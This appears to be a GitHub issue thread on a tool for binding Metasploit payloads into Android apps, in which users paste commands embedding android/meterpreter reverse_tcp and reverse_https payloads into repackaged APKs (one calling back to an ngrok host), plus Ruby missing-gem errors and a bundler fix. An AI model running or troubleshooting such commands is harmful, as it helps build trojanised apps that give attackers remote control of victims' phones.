### ISSUE TITLE
Error

### ISSUE THREAD

**Issue by MohammadMirsafaei** [xc0d3rz/metasploit-apk-embed-payload#30]
ruby apk-embed-payload.rb ClashOriginal.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=4444
/usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require': cannot load such file -- colorize (LoadError)
	from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
	from apk-embed-payload.rb:9:in `<main>'

what should I do?!

**Comment by 0vulns** [comment]
Installation

 gem install bundler
 bundler install

**Comment by Fsocietyxd** [comment]
./run YoWAV7.50_com.yowa_Yousef_Al_Basha.apk -p android/meterpreter/reverse_https LHOST=0.tcp.ng
rok.io LPORT=13494
Traceback (most recent call last):
        2: from apk-embed-payload.rb:6:in `<main>'
        1: from /usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require'
/usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require': cannot load such file -- nokogiri (LoadError)



already install bundler

sudo gem install bundler
Fetching: bundler-1.16.2.gem (100%)
Successfully installed bundler-1.16.2
Parsing documentation for bundler-1.16.2
Installing ri documentation for bundler-1.16.2
Done installing documentation for bundler after 11 seconds
1 gem installed

**Comment by PamithAnand** [comment]
Traceback (most recent call last):
	2: from apk-embed-payload.rb:9:in `<main>'
	1: from /usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require'
/usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require': cannot load such file -- colorize (LoadError)


This is the error that i am getting trying to bind a payload into an apk.Please help!!
